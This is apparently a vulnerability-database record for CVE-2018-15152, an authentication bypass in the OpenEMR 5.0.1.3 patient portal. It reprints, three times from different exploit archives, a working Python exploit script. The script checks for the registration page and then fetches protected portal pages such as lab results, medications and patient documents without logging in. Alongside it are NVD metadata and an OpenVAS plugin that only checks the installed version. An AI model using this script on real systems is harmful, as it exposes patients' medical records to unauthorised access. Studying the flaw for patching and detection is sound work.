OpenEMR 5.0.1.3 - Authentication Bypass

2021-06-16T00:00:00

Description

{"id": "EDB-ID:50017", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "OpenEMR 5.0.1.3 - Authentication Bypass", "description": "", "published": "2021-06-16T00:00:00", "modified": "2021-06-16T00:00:00", "epss": [{"cve": "CVE-2018-15152", "epss": 0.12039, "percentile": 0.94537, "modified": "2023-06-23"}], "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://www.exploit-db.com/exploits/50017", "reporter": "Ron Jost", "references": [], "cvelist": ["2018-15152", "CVE-2018-15152"], "immutableFields": [], "lastseen": "2023-09-18T08:43:48", "viewCount": 307, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-15152"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112356"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163181"]}, {"type": "zdt", "idList": ["1337DAY-ID-36428"]}]}, "score": {"value": 9.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-15152"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310112356"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163181"]}, {"type": "zdt", "idList": ["1337DAY-ID-36428"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2018-15152", "epss": 0.14106, "percentile": 0.9484, "modified": "2023-05-07"}], "vulnersScore": 9.1}, "_state": {"dependencies": 1695026826, "score": 1695026854, "epss": 0}, "_internal": {"score_hash": "958de5f38b6ff9ee3a41c28b27570ee1"}, "sourceHref": "https://www.exploit-db.com/raw/50017", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\r\n# Date 15.06.2021\r\n# Exploit Author: Ron Jost (Hacker5preme)\r\n# Vendor Homepage: https://www.open-emr.org/\r\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\r\n# Version: All versions prior to 5.0.1.4\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2018-15152\r\n# CWE: CWE-287\r\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\r\n\r\n'''\r\nDescription:\r\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\r\nthe registration page and modifying the requested url to access the desired page. Some\r\nexamples of pages in the portal directory that are accessible after browsing to the\r\nregistration page include:\r\n- add_edit_event_user.php\r\n- find_appt_popup_user.php\r\n- get_allergies.php\r\n- get_amendments.php\r\n- get_lab_results.php\r\n- get_medications.php\r\n- get_patient_documents.php\r\n- get_problems.php\r\n- get_profile.php\r\n- portal_payment.php\r\n- messaging/messages.php\r\n- messaging/secure_chat.php\r\n- report/pat_ledger.php\r\n- report/portal_custom_report.php\r\n- report/portal_patient_report.php\r\nNormally, access to these pages requires authentication as a patient. If a user were to visit\r\nany of those pages unauthenticated, they would be redirected to the login page.\r\n'''\r\n\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport requests\r\nimport argparse\r\n\r\n\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\r\nmy_parser.add_argument('-T', '--IP', type=str)\r\nmy_parser.add_argument('-P', '--PORT', type=str)\r\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\r\nmy_parser.add_argument('-R', '--PathToGet', type=str)\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.IP\r\ntarget_port = args.PORT\r\nopenemr_path = args.Openemrpath\r\npathtoread = args.PathToGet\r\n\r\n\r\n'''\r\nCheck for vulnerability:\r\n'''\r\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\r\nsession = requests.Session()\r\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\r\ncheck_vuln = session.get(check_vuln_url).text\r\nprint('')\r\nprint('[*] Checking vulnerability: ')\r\nprint('')\r\n\r\nif \"Enter email address to receive registration.\" in check_vuln:\r\n print('[+] Host Vulnerable. Proceeding exploit')\r\nelse:\r\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\r\n\r\n'''\r\nExploit:\r\n'''\r\nheader = {\r\n 'Referer': check_vuln_url\r\n}\r\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\r\nExploit = session.get(exploit_url, headers=header)\r\nprint('')\r\nprint('[+] Results: ')\r\nprint('')\r\nprint(Exploit.text)\r\nprint('')", "osvdbidlist": [], "exploitType": "webapps", "verified": false}

{"cve": [{"lastseen": "2023-06-23T14:29:08", "description": "Authentication bypass vulnerability in portal/account/register.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker to access (1) portal/add_edit_event_user.php, (2) portal/find_appt_popup_user.php, (3) portal/get_allergies.php, (4) portal/get_amendments.php, (5) portal/get_lab_results.php, (6) portal/get_medications.php, (7) portal/get_patient_documents.php, (8) portal/get_problems.php, (9) portal/get_profile.php, (10) portal/portal_payment.php, (11) portal/messaging/messages.php, (12) portal/messaging/secure_chat.php, (13) portal/report/pat_ledger.php, (14) portal/report/portal_custom_report.php, or (15) portal/report/portal_patient_report.php without authenticating as a patient.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15152", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2022-02-10T07:24:00", "cpe": [], "id": "CVE-2018-15152", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15152", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": []}], "packetstorm": [{"lastseen": "2021-06-17T18:43:37", "description": "", "cvss3": {}, "published": "2021-06-17T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-17T00:00:00", "id": "PACKETSTORM:163181", "href": "https://packetstormsecurity.com/files/163181/OpenEMR-5.0.1.3-Authentication-Bypass.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass \n# Date 15.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: All versions prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15152 \n# CWE: CWE-287 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit \n \n''' \nDescription: \nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to \nthe registration page and modifying the requested url to access the desired page. Some \nexamples of pages in the portal directory that are accessible after browsing to the \nregistration page include: \n- add_edit_event_user.php \n- find_appt_popup_user.php \n- get_allergies.php \n- get_amendments.php \n- get_lab_results.php \n- get_medications.php \n- get_patient_documents.php \n- get_problems.php \n- get_profile.php \n- portal_payment.php \n- messaging/messages.php \n- messaging/secure_chat.php \n- report/pat_ledger.php \n- report/portal_custom_report.php \n- report/portal_patient_report.php \nNormally, access to these pages requires authentication as a patient. If a user were to visit \nany of those pages unauthenticated, they would be redirected to the login page. \n''' \n \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--Openemrpath', type=str) \nmy_parser.add_argument('-R', '--PathToGet', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.Openemrpath \npathtoread = args.PathToGet \n \n \n''' \nCheck for vulnerability: \n''' \n# Check, if Registration portal is enabled. If it is not, this exploit can not work \nsession = requests.Session() \ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php' \ncheck_vuln = session.get(check_vuln_url).text \nprint('') \nprint('[*] Checking vulnerability: ') \nprint('') \n \nif \"Enter email address to receive registration.\" in check_vuln: \nprint('[+] Host Vulnerable. Proceeding exploit') \nelse: \nprint('[-] Host is not Vulnerable: Registration for patients is not enabled') \n \n''' \nExploit: \n''' \nheader = { \n'Referer': check_vuln_url \n} \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread \nExploit = session.get(exploit_url, headers=header) \nprint('') \nprint('[+] Results: ') \nprint('') \nprint(Exploit.text) \nprint('') \n \n \n \n`\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/163181/openemr5013-bypass.txt"}], "zdt": [{"lastseen": "2021-12-04T15:55:59", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-06-16T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (register) Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15152"], "modified": "2021-06-16T00:00:00", "id": "1337DAY-ID-36428", "href": "https://0day.today/exploit/description/36428", "sourceData": "# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip\n# Version: All versions prior to 5.0.1.4\n# Tested on: Ubuntu 18.04\n# CVE: CVE-2018-15152\n# CWE: CWE-287\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit\n\n'''\nDescription:\nAn unauthenticated user is able to bypass the Patient Portal Login by simply navigating to\nthe registration page and modifying the requested url to access the desired page. Some\nexamples of pages in the portal directory that are accessible after browsing to the\nregistration page include:\n- add_edit_event_user.php\n- find_appt_popup_user.php\n- get_allergies.php\n- get_amendments.php\n- get_lab_results.php\n- get_medications.php\n- get_patient_documents.php\n- get_problems.php\n- get_profile.php\n- portal_payment.php\n- messaging/messages.php\n- messaging/secure_chat.php\n- report/pat_ledger.php\n- report/portal_custom_report.php\n- report/portal_patient_report.php\nNormally, access to these pages requires authentication as a patient. If a user were to visit\nany of those pages unauthenticated, they would be redirected to the login page.\n'''\n\n\n'''\nImport required modules:\n'''\nimport requests\nimport argparse\n\n\n'''\nUser-Input:\n'''\nmy_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--Openemrpath', type=str)\nmy_parser.add_argument('-R', '--PathToGet', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nopenemr_path = args.Openemrpath\npathtoread = args.PathToGet\n\n\n'''\nCheck for vulnerability:\n'''\n# Check, if Registration portal is enabled. If it is not, this exploit can not work\nsession = requests.Session()\ncheck_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'\ncheck_vuln = session.get(check_vuln_url).text\nprint('')\nprint('[*] Checking vulnerability: ')\nprint('')\n\nif \"Enter email address to receive registration.\" in check_vuln:\n print('[+] Host Vulnerable. Proceeding exploit')\nelse:\n print('[-] Host is not Vulnerable: Registration for patients is not enabled')\n\n'''\nExploit:\n'''\nheader = {\n 'Referer': check_vuln_url\n}\nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread\nExploit = session.get(exploit_url, headers=header)\nprint('')\nprint('[+] Results: ')\nprint('')\nprint(Exploit.text)\nprint('')\n", "sourceHref": "https://0day.today/exploit/36428", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "openvas": [{"lastseen": "2019-08-07T14:47:38", "description": "This host is running OpenEMR and is\n prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-08-14T00:00:00", "type": "openvas", "title": "OpenEMR < 5.0.1.4 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2018-15152", "CVE-2018-15155", "CVE-2018-15153", "CVE-2018-15144", "CVE-2018-15148", "CVE-2018-15149", "CVE-2018-15141", "CVE-2018-15145", "CVE-2018-15147", "CVE-2018-15143", "CVE-2018-15142", "CVE-2018-15140", "CVE-2018-15146", "CVE-2018-15150", "CVE-2018-15154", "CVE-2018-15151", "CVE-2018-15156"], "modified": "2019-08-06T00:00:00", "id": "OPENVAS:1361412562310112356", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112356", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# OpenEMR < 5.0.1.4 Multiple Vulnerabilities\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112356\");\n script_version(\"2019-08-06T09:01:24+0000\");\n script_cve_id(\"CVE-2018-15139\", \"CVE-2018-15140\", \"CVE-2018-15141\",\n \"CVE-2018-15142\", \"CVE-2018-15143\", \"CVE-2018-15144\", \"CVE-2018-15145\",\n \"CVE-2018-15146\", \"CVE-2018-15147\", \"CVE-2018-15148\", \"CVE-2018-15149\",\n \"CVE-2018-15150\", \"CVE-2018-15151\", \"CVE-2018-15152\", \"CVE-2018-15153\",\n \"CVE-2018-15154\", \"CVE-2018-15155\", \"CVE-2018-15156\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-08-06 09:01:24 +0000 (Tue, 06 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-14 09:22:33 +0200 (Tue, 14 Aug 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"OpenEMR < 5.0.1.4 Multiple Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is running OpenEMR and is\n prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaws consist of multiple SQL injection vulnerabilities,\n directory traversal vulnerabilities, OS command injection vulnerabilities, an authentication bypass vulnerability\n and an unrestricted file upload vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenEMR versions before 5.0.1.4\");\n\n script_tag(name:\"solution\", value:\"Upgrade to OpenEMR version 5.0.1.4 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1765/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1758/files\");\n script_xref(name:\"URL\", value:\"https://github.com/openemr/openemr/pull/1757/files\");\n script_xref(name:\"URL\", value:\"https://insecurity.sh/reports/openemr.pdf\");\n script_xref(name:\"URL\", value:\"https://www.open-emr.org/wiki/index.php/OpenEMR_Patches\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_openemr_detect.nasl\");\n script_mandatory_keys(\"openemr/installed\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nCPE = \"cpe:/a:open-emr:openemr\";\n\nif( ! port = get_app_port( cpe: CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[ 'version' ];\nlocation = infos[ 'location' ];\n\nif( version_is_less( version: version, test_version: \"5.0.1-4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.0.1-4\", install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}

OpenEMR 5.0.1.3 - Authentication Bypass

Description

Related